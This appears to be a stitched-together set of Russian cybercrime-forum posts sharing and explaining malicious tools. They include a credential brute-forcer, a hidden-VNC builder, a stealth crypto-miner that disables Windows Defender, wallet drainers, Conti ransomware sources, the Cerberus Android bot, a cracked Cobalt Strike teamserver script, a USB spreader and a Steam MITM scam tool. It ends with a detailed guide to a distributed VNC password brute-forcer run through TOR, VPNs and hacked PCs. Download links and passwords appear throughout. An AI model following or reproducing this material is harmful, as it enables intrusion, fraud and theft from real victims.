выбираете и брут будет идти без прокси. Выбираете модуль, проставляете нужное
вам количество потоков и запускаете.
Менять прокси лист, комбо лист или модуль во время перебора вообще не
желательно. Но вы можете поменять количество потоков прям во время работы,
софт автоматически подхватит количество потоков и при необходимости избавится
от лишних, либо создаст новые неостающие. Что бы получить статистику по бруту
нужно нажимать на кнопку обновить справа от слова статистика, да возможно это
не удобно, может следовало сделать что бы он по вебсокетам обновлял
статистику, ну хз, не захотел делать дополнительную нагрузку на софт.
Результаты соответственно можно посмотреть нажав на кнопку результаты,
откроется следующая вьюшка.
Собственно здесь обычная пагинация по результатам, выбираете что хотите
посмотреть, сколько должно отображаться записей разом и уже смотрите.
Результат можно скачать в друх форматах, либо txt, либо xlsx, думаю кто
работал с экселем обязательно заценит. Если по гудам были какие-то логи то они
будут в правой колонки с логом. Тут уже зависит от проекта который вы
запускаете.
**
Инструкция по использованию**
Устанавливаем Node.js с официальнго сайта https://nodejs.org/en/download.
Устанавливаем Vue-cli командой npm install -g @vue/cli.
Устанавливаем Golang с официального сайта https://go.dev/doc/install.
Качаем исходник фронтенда и бэкенда.
В папке с фронтом запускаем npm i в папке с бэком go mod tidy и go mod vendor.
Если планируете запускать BruteCore у себя на тачке локально, то нужно сделать
следующее:
Если будете запускать BruteCore на сервере, то нужно сделать следующее:
По итогу мы имеем папку dist с фронтом и исполняемый файл для linux с
бэкендом. Теперь мы заходим на наш сервак и обновляем имеющиеся на нем пакеты
до последней версии командами:
sudo apt update
sudo apt upgrade
Накатываем nginx командой:
sudo apt nginx
Копируем содержимое папки dist в папку /var/www/front.brutecore
Копируем скомпилированный main, .env, BruteCore.sqlite в папку
/var/www/back.bruteforce
После запускаем команду chmod +x main
В папке /etc/nginx/sites-available создаем файл brutecore со следующим
содержимым, где server_name localhost, “localhost” меняем на свой домен или
адрес сервера:
NGINX:Copy to clipboard
server {
listen 80;
server_name localhost;
charset utf-8;
root /var/www/front.brutecore;
index index.html;
#Always serve index.html for any request
location /Health {
proxy_pass http://127.0.0.1:985/Health;
}
location /api {
proxy_pass http://127.0.0.1:985/api;
}
location / {
root /var/www/front.brutecore;
try_files $uri /index.html;
}
error_log /var/log/nginx/vue-app-error.log;
access_log /var/log/nginx/vue-app-access.log;
}
Дальше выполняем команду:
sudo ln -s /etc/nginx/sites-available/brutecore /etc/nginx/sites-enabled/
Также редактируем файл /etc/nginx/nginx.conf
Находим вот эти строки и раскоменчиваем их
Также нам надо рядом добавить строку: client_max_body_size 20M;
Это нужно что бы nginx сжимал стили и прочие скрипты, а также что бы мы могли
без проблем загружать модули на сервер.
Перезапускаем nginx командой: sudo systemctl restart nginx
После чего запускаем бэкенд комагдой sudo nohup ./main &
, и переходим в
браузере по адресу нашего сервера или домена. Если все сделали правильно, то
должно появиться окно входа и мы без проблем в нем авторизовываемся.
Если после входа в Учетку будете получать ошибку “failed to initialize
database, got error Binary was compiled with 'CGO_ENABLED=0', go-sqlite3
requires cgo to work. This is a stub” то тогда нужно установить гошку на
сервак, потом установить туда же gcc/g++ компилятор командой sudo apt-get install build-essential
и после чего уже билдить приложение на серваке и оно
будет работать.
Все исходники можно скачать по ссылке https://www.sendspace.com/file/2ujpbd
Специально развернул демку что бы можно было посмотреть как оно выглядит уже
задеплоенное http://45.83.122.198/ Логин XSSViewer, Пароль: xss.is1pass
Hidden VNC
Билдер + Бекконект сервер.
Работает на Win 7-10 x32/x64.
Hidden content for authorized users.
https://www.sendspace.com/file/xkjyiv
пасс: L7gIRddUtTQgKML
sources - https://www.sendspace.com/file/g3twv9
pwd - GT648NDDW75fne
CH Miner - Скрытая система майнинга и контроля для любых консольных майнеров.
**
**
**
Сканы:**
![avcheck.net](/proxy.php?image=https%3A%2F%2Favcheck.net%2Fimg%2Flogo- blue.png&hash=cee6508989b328cffbfe9596440db6c7&return_error=1) avcheck.net
dyncheck.com
Функционал:
Скрытый запуск любых майнеров с консольными параметрами.
Определение CPU/GPU - Кол-во памяти видео карты и подбор нужного майнера в зависимости от памяти GPU
Майнеры отправляются в сжатом zip архиве с паролем что позволяет уменьшить рантайм детект и сжать очень тяжелые майнеры(например более 650мб что бы не слили на ВТ после крипта)
В комплекте 3 почищенных майнера под RavenCoin, Monero, Ethereum.
Авто-старт майнеров при появлении новых ботов
Доп. Функции:
File Loader
Remote Desktop
File Manager
Process Manager
Remote Shell
Execute .NET Code
Get Admin Privileges
Disable Windows Defender
Visit WebSite
Send MessageBox
Client: Close, Restart, update, uinstall
PC: LogOff, Restart, Shutdown
Block Bot
Защита:
**Aggressive - не дает запускаться популярным диспетчерам задач.**
**Easy - При обнаружении популярных диспетчеров задач завершает процессы майнинга и себя(ждет 4 минуты и снова запускается убивая 1 раз все диспетчеры задач)**
Тестить на ВМ! Но вроде чист, на лева не стучал не билд не панель.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
RrYnAl2L8M0-9eEDaSl_kKiu7JV9YFgVkMmo)
mega.nz
Spoiler: Скрины доп.
![gofile.io](/proxy.php?image=https%3A%2F%2Fgofile.io%2Fdist%2Fimg%2Flogo- small-og.png&hash=32429581fada6ae1887e27dfa99f76aa&return_error=1)
Secure, fast and free cloud storage solution. Upload and share files instantly.
gofile.io
Pass:M68gut9psitrexY465Gas
Всем привет!
Нашёл дрейнеры.
Дрейнер если кто-то не знает это программа предназначенная для быстрого и
автоматизированного опустошения криптокошельков — то есть вывода из них всех
(или наиболее ценных) активов на кошельки "злоумышленников"
1. MS Unlimited drainer
2. MS Solana drainer
3. Julia drainer
4. x-tondrainer
5. The open drainer drainer (хз что это)
6. НН drainer
You must have at least 15 reaction(s) to view the content.
Инструкция внутри
Запускайте данный софт на виртуалке либо дедике!!!!!!
Скачать:
https://mega.nz/#!ImBWnYYD!uHFvGMMH1mmisiIbAvOcE3Qnj5Tz4qxDcGikIqgKhY0
https://spyralscanner.net/result.php?id=utyYU4nORI
https://spyralscanner.net/result.php?id=8T9yQS2KEZ
Conti Ransomware Sources v3.7
You must have at least 1 reaction(s) to view the content.
Private Keeper - Приложение для разработчиков. Продвинутый инструмент для людей, которые хотят разрабатывать приложения без знания языков программирования.
Функционал программы:
Изначально данное приложение было создано как сборник брутфорсов и полезных
утилит.
Но в процессе разработки, оно было практически полностью переделано и
переосмысленно.
Теперь, вы сами можете создавать свои брутфорсы\утилиты с помощью in-Line
технологий.
Содержит в себе утилиту для сбора приватных проксей из других приватных
сервисов.
Так же есть уже готовые проекты, находятся они на данном сайте, в разделе
"Магазин приложений".
Имеет огромное количество бесплатных проектов, которые постоянно пополняются.
Присутствует возможность собрать все свои другие программы в одно место в
панели "Интегрированные приложения".
Дополнительные утилиты:
В программе присутствует огромный список утилит для работы с текстом и
проксями.
Вам больше не нужно "таскать" с собой кучу текстовых утилит.
in-Line утилиты:
Лучшая часть программы, c помощью данных утилит, вы без проблем сможете
создавать брутфорс или утилиту любой сложности.
Интеграция сторонних приложений:
В данной секции вы сможете создать ссылки на свои программы для их быстрого
запуска.
В программе присутствует настройка - "Автоматически открывать программу при
входе в программу", таким образом,
при запуске системы вам больше не нужно искать свои другие приложения, вам
просто нужно перейти во вкладку "Интегрированные приложения".
Информация по данному релизу:
Весь функционал оффлайн проектов, редактора inLine-Kit Studio будет работать
даже после официального отключения сервера автора программы.
СКАЧАТЬ | VT Private Keeper.exe
You must spend at least 1 day(s) on the forum to view the content.
Пароль: XSS.IO
Описание думаю не нужно, любители Android ботов и так знают что это.
Скачать - https://www.sendspace.com/file/qgxt59
Пароль - XsS.is
Был слит уже давненько, сейчас есть новая версия, автор maza-in. В архиве
админка, apk файл, кое какие инжы даже есть.
Рабочий All In One Checker (AIOC)
VT
Hidden content for authorized users. Download
Since I already posted this on another forum I just want to share also here.
Cerberus v10 ( It is not mine , I just found it in wild and sharing) : smile2:
You must have at least 5 reaction(s) to view the content.
Видеоинструкции от Conti + инструментарий ~27 гигов.
You must have at least 0 reaction(s) to view the content.
torrent:
drive.google.com/file/d/17RsKc8DKSIJ5buWfTn0EP2YrHNzSfTH1/view?usp=sharing
pass:xss.is
Или здесь:
You can view and join @ContiTrainingRansomware right away.
t.me
Cobalt Strike v3.12
Teamserver Launch Script
Spoiler
Code:Copy to clipboard
#!/bin/bash
#
# Start Cobalt Strike Team Server
#
# make pretty looking messages (thanks Carlos)
function print_good () {
echo -e "\x1B[01;32m[+]\x1B[0m $1"
}
function print_error () {
echo -e "\x1B[01;31m[-]\x1B[0m $1"
}
function print_info () {
echo -e "\x1B[01;34m[*]\x1B[0m $1"
}
# check that we're r00t
if [ $UID -ne 0 ]; then
print_error "Superuser privileges are required to run the team server"
exit
fi
# check if java is available...
if [ $(command -v java) ]; then
true
else
print_error "java is not in \$PATH"
echo " is Java installed?"
exit
fi
# check if keytool is available...
if [ $(command -v keytool) ]; then
true
else
print_error "keytool is not in \$PATH"
echo " install the Java Developer Kit"
exit
fi
# generate a certificate
# naturally you're welcome to replace this step with your own permanent certificate.
# just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
# -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
# an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
# is printed so users may have a chance to verify they're not being owned.
if [ -e ./cobaltstrike.store ]; then
print_info "Will use existing X509 certificate and keystore (for SSL)"
else
print_info "Generating X509 certificate and keystore (for SSL)"
keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
fi
# start the team server.
java -XX:parallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*
Скачать:
You must have at least 10 message(s) to view the content.
Версия полная, без триальных лимитов.
Итак, тут будем класть исходники ботов.
Партия первая:
Размер: ~75 мегов
Внутри ИСХОДНИКИ
Added by: DeusTirael
Чтобы скачать - нужен любой Bittorent клиент.
Я рекомендую Azureus.
Azureus 2.3.0.6
BitTorrent-клиент для быстрой загрузки файлов. Особенно подходит для скачки
файлов большого размера. Поддерживает мультизагрузку, настройку
очереди/приоритета, докачку недокаченных фрагментов, переключение языка
интерфейса и многое другое. Кроме этого, программа расширяется плагинами
<скачать плагины>
Для работы Azureus требуется виртуальная <Java-машина>. Обратите внимание: в
некоторых вариантах Windows XP java-машины может не быть, и тогда Azureus сам
предложит ее загрузить.
<Скачать Azureus 2.3.0.6>
После перехода по ссылке загрузка программы Azureus 2.3.0.6 начнется через 10
секунд автоматически.
------------------------------------------------------------------------------------------
Чекер слит из под хайда на BHF
Адаптирован под private keeper
Сам не юзал!
You must have at least 25 message(s) to view the content.
Не так давно с кодил обычный USB распространитель
И решил выложить на этот форум
Что это прога делать?
инфицирует все папки на флеш носители,
то есть при запуске папки запуститься
сам распространитель
так же можно склеить сам билд файла с вашим exe.
Пишите в комы какой функционал хотели бы увидеть данного USB Spread.
git: https://github.com/GayFox/Malware.git
XSS Linux - это операционная система, основанная на Ubuntu. При разработке
данного дистрибутива учитывались все пожелания людей, которые хотят остаться
анонимными в сети.
Для этого было сделано следующее:
Текущая версия BETA 0.0.2
Скачать: Версия для
VmWare
готов выслушать отзывы и предложения.
TODO:
Настоятельно рекомендую поместить виртуальную машину в VeraCrypt контейнер (размер 50 гб), чтобы избежать неправомерного доступа к личной информации на виртуальной машине.
У этого софта нет названия, да и наверняка не будет. Лишь объясняющее его предназначение - фейк-удержание предметов.
Начнём наверное с объяснения, что же такое этот ваш MITM?
MITM - это сокращение от "Man-in-the-Middle" (Человек посередине). Давай
разберемся, что это за штука. Представь, у тебя есть два друга, Кирилл и Лёха,
и они обмениваются сообщениями. Ты решаешь влезть между ними, будучи как бы в
середине. Так вот, ты - этот MITM. Твоя цель? На самом деле, она не всегда
дружелюбная. Ты можешь подслушивать и даже изменять их сообщения без их
ведома.
наглядный пример(взят с гитхаба)
Думаю всем стало ясно, что такое MITM-атака..- Почему именно Steam, почему именно туда?
В Steam ежедневно обманывают кучу людей на тысячи рублей(а может и долларов), зачастую это подмена, но какой идиот будет вводить свой логин и пароль, так ещё и мобильный аутенфикатор(таких полудурков куча, я соглашусь с вами), а что если мы сделаем всё намного проще? Людям не придётся вводить ни логины, ни паролы, никакие коды, а мы всё равно опустошим их карманы. Всё зависит от наших навыков социальной инженерии, в Steam обменах существует такая система как удержание трейда, как она работает? Всё достаточно просто: человек получает предметы в удержание(как в гаранте, и сам стим назвал это Escrow), то есть они просто зависли в воздухе, но ничего мы с ними сделать не сможем, и лишь через некое время мы их получим(зачастую это 15 дней). А зачем нам это ПО с MITM-атакой, чем оно нам поможет? Мы будем симулировать, что у нас будет трейд в удержание, зачастую это по таким причинам как непривязанный номер телефона, недостаточно времени держится на аккаунте мобильный аутенфикатор.
И что?!..- Если мы дошли до такой степени, то почему бы не заставить Steam снимать блокировки?
К сожалению такое невозможно, есть конечно непроверенная информация, но мне заявляли, что таким способом люди снимали VAC-баны в CS:GO, и могли играть в рейтинг(честно, звучит бредово). Над этим проектом работал я суммарно неделю, где первые два-три дня убивал, да как же это вообще реализовать?!! Разве такое возможно?!..- Да, возможно. Я наверное тратил своё время в глупую, пытаясь сделать инъекцию в сам Steam-клиент, и менять таким образом данные через память, но, как же это было всё таки глупо! Осознав, что весь Steam-клиент это на самом деле один большой браузер, ко мне пришло осознание, что всё намного проще чем есть..
Spoiler: ознакомиться
Где деньги, где же суть от такого ПО?!
Деньги есть, были, и будут. Наверное не такие огромные, чтобы я мог поразить в шок или некий ужас, да и вообще больше похоже всё это на некий детский обман. Так и есть, скорей всего, но пока я еще учусь в школе, меня впринципе устраивает этот малый хлеб, сейчас так же ведется разработка система лицензий(сомневаюсь, что кому с этого форума это будет интересно). Наверное первая суть этого ПО, когда я его писал - это деньги, серьёзно, знания есть, а заказов нет, это плачевно на самом деле. В данный момент, для читателей этой статьи - это лёгкие уязвимости Steam, которые лежат на плаву, может для кого нибудь удочка, а может кому то просто интересно почитать и узнать что-то новое.
Spoiler: прибыль за сентябрь
Давайте теперь перейдём к самому главному!
Демонстрация работы этого ПО на практике, наверное стоило бы мне побояться некой анонимности, и понять, что всё таки планета круглая и все мы рано или поздно свидемся.
Spoiler: Демонстрация
![dropmefiles.com](/proxy.php?image=https%3A%2F%2Fdropmefiles.com%2Fimages%2Fshare- logo_vk.png&hash=3f67b87028329be58fe8d4c73ccac7b9&return_error=1)
](https://dropmefiles.com/8zGxj)
Share your pictures, send large videos, exchange music or transfer big files. No registration required. Unlimited upload/download speed.
dropmefiles.com
На чем же написано всё это?
Всеми любимый(ненавистный) - Python 3.12. Наверное рукастые будут меня бить за несоблюдение структуры в коде, и прочего, но прошу вас, если вы всё таки хотите мне показать и тыкнуть пальцем где я сделал, что либо не так, то не надо просто кричать 'АААА ГОВНОКОД', сформулируйте свои мысли и адекватно напишите их на клавиатуре, можете прям сюда.
Как установить?
Установите Python 3.12 - при установке обязательно нажмите ADD TO PATH.
Откройте cmd и введите следующую команду
Code:Copy to clipboard
pip install mitmproxy
Запустите ПО и введите рандомную почту.
Перейдите на http://mitm.it/ - и установите сертификат в соответствии с
инструкциями на вашу ОС.
Закройте ПО и перезапустите его. Если у вас ошибки с SSL сертификатом,
попробуйте переустановить всё с выключенным брэндмауэром.
Готово!
Где ознакомиться с кодом?
Приложен в архиве steam.zip
UPD
-не могу разобраться как сюда вставить видео с демонстрацией работы.. умельцы, жду от вас помощи (более не актуально)
Spoiler: Связь со мной
Мой QTOX для связи/помощи: 398409498773EFA30C59807EB9F39CC3219F2C3087F64C67916A65D609FE2362E2F06D3966DD
процесс загрузки системы
Введение
XSS.is RFB Bruter – это система распределенного перебора паролей для VNC прямо
из дома через связку TOR+VPN на ферме виртуальных машин с поддержкой бэкапов,
нотификации на смартфон через приложение «pushed» и масок фильтрации. В
качестве источника адресов используется обработанный лог masscan (хотя можно
добавлять адреса и порты «руками»), а в качестве VPN используется приложение
«SoftEther VPN» и их замечательный сервис бесплатных VPN — «VPN Gate», который
поможет нам не платить за VPN. Помимо этого прекрасного сервиса «SoftEther
VPN» имеет ряд других важных особенностей — работа через socks (TOR), а также
поддержку ICMP (ping). Подробнее об этом ниже.
Как и любая другая распределенная система, XSS.is RFB Bruter состоит из «менеджера» и «рабочих процессов». «Рабочие процессы», в свою очередь, делятся на «чекеры» и «воркеры»: первые проверяют списки ip:port на баннер VNC (а также удаляют ненужные и пропускают недоступные), вторые же — перебирают пароли, а заправляет всем этим делом «менеджер». «Рабочие процессы» и «менеджер» общаются между собой через отдельный intranet-адаптер, прямой доступ во внешний мир имеет только «менеджер» (для отправки оповещений), остальные видят мир только через связку TOR+VPN.
Обращаю внимание, что это система именно для «домашнего» использования: трафик между менеджером и рабочими процессами никак не шифруется.
Изначально система работала без VPN, напрямую через TOR (Whonix Gateway), но это накладывало ряд ограничений: Whonix «перегревался» от количества соединений и требовал регулярных ребутов, а помимо этого — часто отваливалось соединение с хостом, на котором идет перебор (TOR старается менять адреса в цепочках, через это конечный узел не всегда доступен). С VPN все работает гораздо стабильнее и быстрее: время, требуемое на пересортировку списка адресов для брута увеличилось в десятки раз, т.е. за один проход перебирается большее количество комбинаций. Кроме того, TOR не дает возможности проверить доступность сети, в отличие от VPN, который прекрасно работает с ICMP пакетами.
Системные требования
Не смотря на то, что все сильно зависит от размеров фермы, общие правила
просты: как можно больше ОЗУ и SSD-накопитель (лучше NVMe, если есть такая
возможность). На моем стареньком тестовом стенде с Core i7-4790 и 32 Гб ОЗУ
хостится 50 VM: Менеджер (1024 Мб), TOR (512 Мб), Воркеры (24x512 Мб) и Чекеры
(24x512 Мб). Загрузка выглядит вот так:
Подготовка VM
Для начала переносим папку «shared» в любое удобное место на SSD. Сам я
использую VirtualBox, так что далее речь пойдет про него. В качестве ОС была
выбрана Windows 7 Compact Edition, каких-либо проблем с ней не наблюдается.
Устанавливаем ОС, дополнения VirtualBox и добавляем постоянную общую папку с
полным доступом указав путь до ,«shared» в моем случае монтируется она на
букву Z. Переходим в настройки дисплея и на вкладке «Удаленный доступ» ставим
галочку «Включить сервер». Далее клонируем образ (имя лучше выбрать вида
«VM01») и приступаем к настройке «рабочих процессов».
Нам понадобится один сетевой адаптер для внутренней сети с именем, скажем, «xss-brute». В настройках «Удаленного доступа» указываем порт 1001 и запускаем ОС. Устанавливаем на нее «SoftEther VPN», меняем IP на, скажем, 172.16.0.1 а имя компьютера на «VM01». В автозагрузку добавляем ярлык (именно ярлык, чтобы изменим один файл меняли параметры всех VM) на файл z:\utils\init\vpn.cmd. Также в автозагрузку необходимо добавить ярлык z:\utils\xss.checker.lnk или z:\utils\xss.worker.lnk в зависимости от типа машины. Выключаем ОС и делаем снимок системы, именуем его «Snapshot 1» и делаем клон под названием «VM02». Меняем в настройках «Удаленного доступа» порт на 1002, запускаем ОС и меняем адрес на 172.16.0.2, а имя ПК — на «VM02». Повторяем процесс необходимое количество раз, не забывая в конце снять снимок и назвать его «Snapshot 1». Обращаю внимание, что сам я использую разные VM для разных типов «рабочих процессов». Сделано это по простой причине — распределение нагрузки сети. Для «воркеров» я использую VPN, установленные на взломанных ранее ПК, для «чекеров» же — бесплатные VPN с «VPN Gate». Как показала практика, при использовании одновременно обоих типов «рабочих процессов» либо быстро обнаруживают аномальную нагрузку сети удаляют VPN, либо нужно снижать количество подключений. Если у вас купленный дедик или только бесплатные VPN — вы можете смело использовать одну VM для обеих задач, поигравшись предварительно с настройками.
Далее настоим TOR. Клонируем самую первую нашу VM, именуем ее «TOR». В настройках «Удаленного доступа» указываем порт 1111, а в настройках Сети нам понадобится два адаптера: первый — NAT, второй же — наша внутренняя сеть «xss- brute». Запускаем ОС, меняем имя ПК на «TOR», а адрес второго адаптера на 172.16.0.111. Копируем папку z:\utils\tor в корень диска C и кидаем в автозагрузку и, на всякий случай, на рабочий стол ярлык файла c:\tor\tor.cmd. Выключаем, делаем снимок «Snapshot 1».
Снова возвращаемся к первой ОС, теперь ее можно не клонировать. В настройках «Удаленного доступа» указываем порт 2222. Если нужны нотификации «pushed» - также указываем два адаптера, как у «TOR»; если не нужны — оставляем только внутреннюю сеть «xss-brute». После запуска копируем на рабочий стол ярлык z:\utils\xss.mgr.lnk, а в ностройках сетевого адаптера внутренней сети указываем адрес 172.16.0.222.
Кладем куда-нибудь недалеко, скажем, на рабочий стол ярлык для shared\utils\vbox_restart.bat.
Теперь, когда все VM готовы к работе, самое время настроить mRemoteNG.
Добавляем коннекты для каждой VM, указывая в качестве IP — адрес ПК где
установлен VirtualBox, а в качестве порта — порт из параметров «Удаленного
доступа» и RDP в качестве протокола.
Когда все готово можно приступить к настройке системы.
Настройка системы
Большинство настроек производятся в конфиг-файлах в формате JSON, многие
настройки можно изменить лишь там, т.е. не меняются «на лету».
Manager
В разделе «server» нас интересуют 3 параметра:
server: interface — на каком интерфейсе слушать порты. Лучше указать интерфейс
внутренней сети (в нашем случае - 172.16.0.0), но также можно указать 0.0.0.0,
чтобы порты смотрели и во внешний мир.
server: worker: port – на каком порту будут ожидаться «воркеры»
server: checker: port – на каком порту будут ожидаться «чекеры»
массив items заполнится сам.
Раздел «notify» нужен лишь при использовании приложения «pushed». Параметры
notify: pushed: app_key, notify: pushed: app_secret и notify: pushed:
app_alias нужно взять из аккаунта pushed.io, параметр notify: pushed: interval
указывает как часто (в секундах) можно отправлять уведомления.
Параметр notify: found указывает уведомлять ли о новых подобранных паролях.
Т.е. по сути включает/отключает нотификацию.
пример нотификаций
В разделе «db» указываются полные пути к базам worker.db и checker.db, а также
задают параметры
db: clear_flags_on_exit – очищать флаги ошибок при выходе. За этот флаг
отвечает пункт меню «Clear unsupported RFB flags on unload» из «DB Maintance».
Нередко бывают случаи, что сегодня стоит аутентификация RealVNC, а завтра что-
то поменяли и появился поддерживаемый тип аутентификации. Если не очищать
флаги - «плохие» VNC при следующем запуске просто не будут читаться из базы,
так что пункт меню «Rescan unsupported RFBs» их не учитывает.
db: rebuild_checkers_on_exit – перемешать и сжать таблицу с адресами на
проверку при выходе. За этот флаг отвечает пункт меню «Rebuild Checkers on
unload» из «DB Maintance». Сам я предпочитаю делать ребилд и сжатие в ручном
режиме данным скриптом
SQL:Copy to clipboard
BEGIN TRANSACTION;
DROP TABLE IF EXISTS new_list;
CREATE TABLE new_list(id INTEGER NOT NULL UNIQUE,ip TEXT NOT NULL,port INTEGER NOT NULL,UNIQUE(ip,port),PRIMARY KEY(id AUTOINCREMENT));
INSERT INTO new_list(ip,port) SELECT ip,port FROM list ORDER BY RANDOM();
DROP TABLE list;
ALTER TABLE new_list RENAME TO list;
COMMIT;
VACUUM;
т.к. база у меня довольно большая (больше 4х Гб) и ребилд занимает немало времени. Кроме того, повторные проходы тоже дают свои плоды — находятся как VNC, так и не-VNC записи, т.е. база подчищается.
Раздел «checker» содержит параметры для работы «чекеров».
checker: path – путь к папке, куда скидываются файлы обработанного лога
masscan
checker: max_items — размер кэша записей «чекера». Оптимально указывать из
расчета количество_чекеровколичество_соединений2, можно больше. Нарпример у
меня это 24*400, но указано 20000, вместо 19200.
checker: read_from_last_id – читать ли базу с начала или с позации checker:
last_id. Задается пунктом меню «Start checking from last ID». У меня
отключено, т.к. повторный проход по старым записям через время дает неплохой
результат.
Раздел «backup» отвечает за резервное копирование
backup: path — куда копировать.
backup: compress — число от 0 до 9, где 0 — вообще без сжатия, 9 —
максимальное. Ввиду особенностей базы данных ставить выше 5 смысла не вижу:
скорость упадет сильно, а прироста в сжатии практически не будет.
backup: copies — количество копий. По достижению максимума удалит старейший
архив.
backup: scheduler: interval — интервал в секундах, как часто копироваться.
backup: scheduler: on_load — копировать при загрузке. Задается пунктом меню
«Backup on load».
backup: scheduler: on_unload — копировать при выгрузке. Задается пунктом меню
«Backup on unload».
Раздел «logging» понятен итак — какие сообщения выводить в логе. Задаются в меню «Logging».
Пункт «settings» задает путь до файла параметров окна — расположения окон, выбранные вкладки, элементы.
Пункт «hello_stat» отвечает за прием статистике «рабочих процессов» при запуске: скажем, перезапускаете вы manager и вместо 0 найденных будет статистика от «работяг».
Worker и Checker имеют практически идентичные конфиги. Разберем
сначала общие параметры:
manager – адрес менеджера, номера портов должны совпадать с конфигом manager.
tasks — количество соединений, подбирается индивидуально.
threads_per_core — количество потоков на процессор. И «чекер» и «воркер»
работают на IOCP, так что указывать 1000 потоков не стоит. Оптимальным
является цифра 2.
timeout — время на обработку подключения.
settings — параметры положения и размеров окна.
connection_check: enabled — отвечает за включение/отключение проверки наличия
связи. Если проверка включена и интернета нет — задачи обрабываться не будут.
connection_check: timeout — время ожидания отклика.
connection_check: address — адрес, к которому будем пытаться подключиться для
проверки связи.
connection_check: reconnect: enabled — включает/отключает переподключение в
случае обрыва связи.
connection_check: reconnect: connection — имя сетевого адаптера VPN.
connection_check: reconnect: timeout — время ожидания отклика.
Spoiler
Внимательный читатель немедленно спросит - «а причем тут вообще ICMP, если ты проверяешь связь через попытку подключиться, а не отправляя пинги?» и я ему тут же отвечу. Дело в том, что когда TOR уже отвалился, а VPN еще нет — пинг выдает ошибки типа «заданная сеть недоступна» и «общий сбой». При этом функция connect() может висеть очень долго, а таски при этом отрабатывают мгновенно — сети ведь и правда нет. Поэтому поток PingThread() висит и ждет, пока функция IcmpSendEcho2() не вернет ERROR_NETWORK_UNREACHABLE или IP_GENERAL_FAILURE — как только это случится работа приостанавливается. Если включен режим connection_check: reconnect: enabled — не дожидаясь таймаутов переподключает VPN, если нет — просто ждет, пока все переподключится само, приостановив работу.
Параметр «list» для «воркера» задает полный путь до базы данных с паролями.
Изначально это был просто текстовик, но sqlite работает с большими объемами
данных весьма эффективно и не жрет память, храня все в ней.
Параметр «retry_count» для «чекера» задает количество попыток
переподключиться.
VPN
В качестве примера используется публичный VPN от «VPN Gate», в случае
использования своего VPN – просто создайте соединение в программе и
экспортируйте соединение, заменив им нужный файл. Итак, идем на сайт
vpngate.net (заблокирован в РФ) и ищем свежий адрес. Сам я использую адреса из
подсети 219.100.37.* — их много и они надежны. Можно выбирать по рейтингу, но
мне больше нравится по ширине канала. Итак, адрес выбран — открываем файл,
скажем, shared\utils\init\01_05.vpn, и меняем значение параметра «string
Hostname» на свой адрес.
Забыл упомянуть. В указанном выше конфиге уже прописан адрес TOR-прокси, на
это тоже стоит обратить внимание. Если будете заменять на свой не-паблик VPN -
можно заменить только адрес, логин и пароль оставив файл в качестве шаблона.
TOR
Здесь все совсем просто. В моей стране TOR блокируется, поэтому ему необходимы
мосты. Также необходима возможность их быстро и беспроблемно менять (это еще
одна причина, почему отошел от Whonix Gateway). Итак, идем в
shared\utils\init\bridges.txt и вписываем актуальные мосты. Совершенно не
важно как вы их получите — telegram, email, сайт torproject или
tor_relay_scanner, главное указать тип моста. Если мосты вам не нужны — просто
укажите UseBridges 0 или вовсе удалите строчку с импортом данного файла из
torcc.
Приступаем к работе
Итак, когда все настроено — предлагаю начать. Запускаем файл vbox_restart.bat,
открываем в mRemoteNG соединение с «tor» и ждем пока он прогрузится и на 100%
подключится к сети. Время от времени автозагрузка не срабатывает (скорее всего
не может прочесть файл bridges.txt и нужно запустить тор руками — именно для
этого в скрипте задержка). Когда TOR запущен — жмем в скрипте enter и ждем,
пока загрузятся остальные ОС. Подключаемся к «manager» и запускаем его. Работа
с программами элементарна и (надеюсь) интуитивно понятна. Про «воркер» и
«чекер» рассказывать особо нечего, выглядят они примерно так и практически
никаких настроек у них нет.
Единственное, что здесь можно настроить — режим «поверх всех окон» (включается
в системном меню) и положение окна (вплоть до свернутого в трей).
С «менеджером» дело обстоят поинтереснее.
Перемещаться по вкладкам можно как с помощью мыши так и хот-кеями: ctrl+tab –
следующая вкладка, ctrl+1-4 – перейти на вкладку от 1 до 4.
При нажатии правой кнопкой мыши на корневом элементе контекстное меню с
возможностью отобразить/скрыть оффлайн и остановить/запустить «работяг».
Нажатие ctrl+a также включает или отключает режим «Отображать все».
Для очистки результатов можно выбрать запись и нажать del. Или же можно нажать
del без выделения и тогда удалятся все записи.
И «Воркерам» и «Чекерам» можно задавать имена, достаточно просто нажать второй
раз по уже выбранному элементу и ввести имя (в моем случае – имя VM).
В данной вкладке работают те же правила, что и на вкладке «Workers» – удалять
можно клавишей del.
Пройдемся по панели инструментов вкладки «Results». Первая кнопка отвечает за
добавление свежего адреса в список на брут (если такого адреса еще нет,
конечно). Если адрес уже сбручен, но нас спалили и поменяли пароль — нам
предложат начать с того места, где был найден первый пароль. Зачем это надо?
Бывает так, что до хоста не дозвониться по несколько дней и когда он
появляется в сети выясняется, что пароль — только на просмотр, поэтому логично
продолжить искать с того места, где остановились в прошлый раз. Следующие две
кнопки помечают хост как «интересный» и как «заблокированный» (довольно частое
явление, когда на экране не кошелек с криптой, а логон-скрин). Четвертая
кнопка просто удаяет элемент из списка, пятая продолжает сканирование (если
доступ — только на просмотр), шестая добавляет в список фильтрации (см. ниже),
последняя — просто очищает весь лог.
Для очистки лога достаточно нажать ctrl+x либо вызвав контекстное меню и нажав
«Сlear».
Как вы можете видеть, у всех «рабочих процессов» есть значки со статусами из ICQ. Зелененький — в работе, красненький — оффлайн, зелененький с красным крестиком — отвалился интернет, зелененький с листочком — нет заданий (возможно, так же нет сети — просто еще не успел по таймауту перезапустить соединение, либо только появился интернет/пришел онлайн).
Работает все это добро по принципу «карусели»: идем по кругу, как только дошли
до конца - «воркеры» сортируются по времени последнего обращения (старики —
вперед), «чекеры» же просто гуляют по кругу. Если в процессе работы «чекер»
